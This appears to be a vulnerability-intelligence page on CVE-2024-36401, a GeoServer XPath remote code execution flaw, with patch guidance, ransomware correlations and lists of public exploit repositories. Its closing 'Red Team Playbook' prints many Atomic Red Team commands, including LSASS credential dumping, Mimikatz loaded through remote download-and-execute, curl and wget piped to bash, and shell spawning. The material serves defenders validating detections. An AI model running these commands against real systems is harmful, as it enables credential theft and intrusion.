CVE-2024-36401
Overview
This vulnerability is a remote code execution flaw caused by unsafe evaluation of property names as XPath expressions within GeoServer's GeoTools library API. The issue arises because property and attribute names for feature types are passed unsafely to the commons-jxpath library, which executes arbitrary code during XPath evaluation. The flaw affects multiple OGC request parameters and impacts both simple and complex feature types in GeoServer installations prior to specific patched versions.
Vulnerability Description
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances. No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests. This vulnerability can lead to executing arbitrary code. Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.
Impact
An unauthenticated attacker can execute arbitrary code on the affected GeoServer instance by sending specially crafted OGC requests, resulting in full system compromise. No user interaction or authentication is required, allowing remote exploitation over the network. Successful exploitation can lead to unauthorized access, data manipulation, service disruption, and potential lateral movement within the affected environment.
Solution
Upgrade GeoServer to versions 2.22.6, 2.23.6, 2.24.4, or 2.25.2 or later, which include patches addressing this vulnerability. Alternatively, remove the vulnerable gt-complex-x.y.jar file from the GeoServer installation as a workaround, noting this may impair functionality or prevent deployment if the module is required. Refer to the GeoServer security advisories at https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv and GeoTools advisories at https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w for detailed patch instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Full Analysis
The vulnerability in GeoServer arises from the insecure handling of OGC request parameters, which allows unauthenticated users to execute arbitrary code on the server. This issue is rooted in the way the GeoTools library API evaluates property names for feature types. Specifically, the library unsafely passes these names to the commons-jxpath library, which can execute arbitrary code when processing XPath expressions. This flaw is particularly concerning because it affects all instances of GeoServer, regardless of the complexity of the feature types being utilized. The vulnerability is exacerbated by the fact that it can be exploited through several widely used web service requests, including WFS GetFeature, WMS GetMap, and WPS Execute, making it a critical risk for any organization using GeoServer.
Attack vectors for this vulnerability are straightforward, as they do not require authentication. An attacker could craft malicious requests targeting the vulnerable endpoints, leveraging the improperly evaluated XPath expressions to execute arbitrary code on the server. For instance, an attacker could send a specially crafted WFS GetFeature request that includes malicious XPath expressions, leading to remote code execution. The potential for exploitation is significant, as attackers could gain control over the server, access sensitive data, or disrupt services. Furthermore, the absence of a public proof of concept does not diminish the risk; the confirmation of exploitability by security researchers indicates a clear and present danger for organizations using affected versions of GeoServer.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on GeoServer for managing and sharing geospatial data. Successful exploitation could lead to unauthorized access to sensitive information, data manipulation, or even complete server compromise. The business risks associated with such an incident include reputational damage, regulatory penalties, and financial losses stemming from data breaches or service disruptions. Organizations may also face increased scrutiny from stakeholders and customers, leading to a loss of trust and potential business opportunities. The critical nature of this vulnerability, reflected in its high CVSS score, underscores the urgency for organizations to address it promptly.
To detect and mitigate this vulnerability, organizations should first ensure they are running the latest patched versions of GeoServer, specifically versions 2.22.6, 2.23.6, 2.24.4, or 2.25.2, which contain fixes for this issue. For those unable to upgrade immediately, a temporary workaround involves removing the `gt-complex-x.y.jar` file from the GeoServer installation, although this may impact certain functionalities. Regular security assessments and vulnerability scans should be conducted to identify any instances of the vulnerable software in use. Additionally, implementing strict access controls and monitoring for unusual activity can help mitigate the risk of exploitation. Organizations should also consider employing web application firewalls to filter and monitor incoming requests for malicious patterns.
In conclusion, the vulnerability in GeoServer represents a significant threat to organizations that utilize this software for geospatial data management. The ease of exploitation, coupled with the potential for severe consequences, necessitates immediate action from affected users. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems against this critical vulnerability and protect their valuable data assets from malicious actors.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-36401, reflected by a noticeable uptick in telemetry signals. This increase coincides with the emergence of multiple new proof-of-concept exploit tools publicly available on GitHub, which demonstrate varied and sophisticated methods to trigger remote code execution via the vulnerable GeoServer OGC request parameters. The broader dissemination of these tools lowers the barrier for threat actors to weaponize this vulnerability, potentially expanding the pool of attackers beyond highly skilled operators. Although ransomware groups have not yet been definitively linked to active campaigns exploiting this flaw, the presence of known ransomware-associated threat actors in the broader ecosystem underscores the potential for future opportunistic abuse. Consequently, the threat landscape surrounding CVE-2024-36401 has intensified, warranting heightened vigilance. While the EPSS score remains stable, the qualitative increase in exploitation activity and the proliferation of exploit code elevate the practical risk to organizations running affected GeoServer versions, underscoring the criticality of timely patching and monitoring.
Update 2 — May 16, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-36401, accompanied by the emergence of an additional ransomware group linked to this vulnerability. This development signals a modest broadening of the threat actor landscape exploiting GeoServer’s remote code execution flaw. Although the overall exploit prediction score remains stable, the uptick in detection activity and the expansion of ransomware group associations indicate growing adversary interest and potential for opportunistic attacks. The proliferation of publicly available proof-of-concept exploits continues to lower the barrier for exploitation, increasing the likelihood of successful intrusions against unpatched systems. Defenders should recognize that while no high-confidence ransomware campaigns have yet been confirmed, the evolving threat environment elevates the urgency for continuous monitoring and rapid response to suspicious activity related to this vulnerability.
Update 3 — May 24, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-36401, indicating sustained adversary interest in leveraging this critical GeoServer vulnerability. While the overall exploitation trend remains stable, the emergence of additional proof-of-concept tools and ongoing scanning activity suggest that threat actors continue to refine their capabilities to exploit this flaw. Notably, no new ransomware group associations have been identified, maintaining the current assessment that ransomware campaigns have yet to incorporate this vulnerability with high confidence. However, the persistence of active exploitation attempts underscores the continued risk to unpatched GeoServer deployments. Defenders should interpret this as a signal that adversaries remain engaged and that the threat environment, while not rapidly escalating, demands ongoing vigilance. The risk level remains critical due to the vulnerability’s inherent severity and ease of exploitation, compounded by the expanding availability of exploitation resources.
Update 4 — June 07, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2024-36401, accompanied by the emergence of new proof-of-concept tools that broaden the attack surface and simplify exploitation across diverse Java Development Kit (JDK) environments. This development is significant because it lowers the technical barrier for threat actors, potentially expanding the pool of adversaries capable of leveraging this critical remote code execution vulnerability. While ransomware groups previously associated with geospatial infrastructure have not demonstrated high-confidence usage of this exploit, the proliferation of publicly available, user-friendly exploit frameworks may accelerate adoption by less sophisticated actors or opportunistic campaigns. Our telemetry indicates that although the overall exploitation trend remains stable, the qualitative shift toward more accessible tooling underscores an evolving threat landscape that demands sustained attention. Consequently, the risk level remains critical, with an increased likelihood of widespread exploitation in unpatched GeoServer deployments due to the enhanced availability and diversity of exploitation methods.
Update 5 — July 05, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-36401, accompanied by the emergence of several new proof-of-concept exploit tools that have gained traction within the threat actor community. This surge in activity reflects an expanding attacker interest and a lowering barrier to entry, as the availability of diverse, user-friendly exploitation frameworks enables a broader range of adversaries to attempt remote code execution against vulnerable GeoServer instances. Although ransomware groups have not yet been definitively linked to active campaigns exploiting this vulnerability, the increased exploitation activity and tool proliferation heighten the risk of opportunistic attacks that could serve as initial access vectors for subsequent ransomware or other malicious operations. Consequently, the threat level remains critical, with the evolving exploitation landscape underscoring the urgency for defenders to maintain vigilant monitoring and prioritize patching efforts to mitigate potential widespread compromise.
Affected Products (11)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Geoserver | Geoserver | All |
cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*
|
|
|
Geoserver | Geoserver | All |
cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*
|
|
|
Geoserver | Geoserver | All |
cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*
|
|
|
Geoserver | Geoserver | All |
cpe:2.3:a:geoserver:geoserver:*:*:*:*:*:*:*:*
|
|
|
Geotools | Geotools | All |
cpe:2.3:a:geotools:geotools:*:*:*:*:*:*:*:*
|
|
|
Geotools | Geotools | All |
cpe:2.3:a:geotools:geotools:*:*:*:*:*:*:*:*
|
|
|
Geotools | Geotools | All |
cpe:2.3:a:geotools:geotools:*:*:*:*:*:*:*:*
|
|
|
Geotools | Geotools | 30.0 |
cpe:2.3:a:geotools:geotools:30.0:-:*:*:*:*:*:*
|
|
|
Geotools | Geotools | 30.0 |
cpe:2.3:a:geotools:geotools:30.0:rc:*:*:*:*:*:*
|
|
|
Geotools | Geotools | 31.0 |
cpe:2.3:a:geotools:geotools:31.0:-:*:*:*:*:*:*
|
|
|
Geotools | Geotools | 31.0 |
cpe:2.3:a:geotools:geotools:31.0:rc:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Geoserver unauthenticated Remote Code Execution
exploits/multi/http/geoserver_unauth_rce_cve_2024_36401
|
- | Unknown | unix, linux | View |
GitHub PoCs (23)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
whitebear-ch/GeoServerExploit
GeoServer(CVE-2024-36401/CVE-2024-36404)漏洞利用工具
|
whitebear-ch | 122 | 6 | 2025-01-07 | View |
|
Chocapikk/CVE-2024-36401
GeoServer Remote Code Execution
|
Chocapikk | 88 | 11 | 2024-07-30 | View |
|
Mr-xn/CVE-2024-36401
Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions with multies ways to exploit
|
Mr-xn | 56 | 6 | 2024-07-06 | View |
|
ahisec/geoserver-
geoserver CVE-2024-36401漏洞利用工具
|
ahisec | 43 | 8 | 2024-07-17 | View |
|
bigb0x/CVE-2024-36401
POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.
|
bigb0x | 34 | 15 | 2024-07-04 | View |
|
bmth666/GeoServer-Tools-CVE-2024-36401
CVE-2024-36401 图形化利用工具,支持各个JDK版本利用以及回显、内存马实现
|
bmth666 | 44 | 2 | 2025-04-11 | View |
|
daniellowrie/CVE-2024-36401-PoC
Proof-of-Concept Exploit for CVE-2024-36401 GeoServer 2.25.1
|
daniellowrie | 3 | 3 | 2024-09-13 | View |
|
justin-p/geoexplorer
Mass scanner for CVE-2024-36401
|
justin-p | 4 | 0 | 2024-08-27 | View |
|
Niuwoo/CVE-2024-36401
POC
|
Niuwoo | 4 | 0 | 2024-07-05 | View |
|
0x0d3ad/CVE-2024-36401
CVE-2024-36401 (GeoServer Remote Code Execution)
|
0x0d3ad | 2 | 0 | 2024-11-27 | View |
|
amoy6228/CVE-2024-36401_Geoserver_RCE_POC
本脚本是针对 GeoServer 的远程代码执行漏洞(CVE-2024-36401)开发的 PoC(Proof of Concept)探测工具。该漏洞允许攻击者通过构造特定请求,在目标服务器上执行任意命令。
|
amoy6228 | 2 | 0 | 2025-04-30 | View |
|
URJACK2025/CVE-2024-36401
An Python Exp For "GeoServer"
|
URJACK2025 | 2 | 0 | 2025-10-04 | View |
|
RevoltSecurities/CVE-2024-36401
Exploiter a Vulnerability detection and Exploitation tool for GeoServer Unauthenticated Remote Code Execution CVE-2024-3...
|
RevoltSecurities | 1 | 0 | 2024-07-05 | View |
|
punitdarji/GeoServer-CVE-2024-36401
GeoServer CVE-2024-36401: Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions
|
punitdarji | 1 | 0 | 2024-09-28 | View |
|
funnyDog896/CVE-2024-36401-WoodpeckerPlugin
CVE-2024-36401-GeoServer Property 表达式注入 Rce woodpecker-framework 插件
|
funnyDog896 | 0 | 1 | 2024-11-28 | View |
|
keelanbrady1011/CVE-2024-36401
Remix of Chokapikk's CVE-2024-36401 to allow webshell-like behaviour on limited environments
|
keelanbrady1011 | 0 | 0 | 2026-07-07 | View |
|
DanieleGiovanardi2408/cve-2024-36401-geoserver-rce
|
DanieleGiovanardi2408 | 0 | 0 | 2026-06-03 | View |
|
Delt-A/CVE-2024-36401-poc
|
Delt-A | 0 | 0 | 2026-05-30 | View |
|
jakabakos/CVE-2024-36401-GeoServer-RCE
|
jakabakos | 0 | 0 | 2024-07-12 | View |
|
y1s4s/CVE-2024-36401-PoC
|
y1s4s | 0 | 0 | 2024-08-01 | View |
|
mantanhacker/CVE-2024-36401-MASS
Geoserver RCE
|
mantanhacker | 0 | 0 | 2025-12-05 | View |
|
kkhackz0013/CVE-2024-36401
|
kkhackz0013 | 0 | 0 | 2024-10-14 | View |
|
reveravip/Exploit-CVE-2024-36401
Python exploit for GeoServer (CVE-2024-36401) with JSP web shell upload
|
reveravip | 0 | 0 | 2025-07-21 | View |
Ransomware Groups 5
Threat Feed
38 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
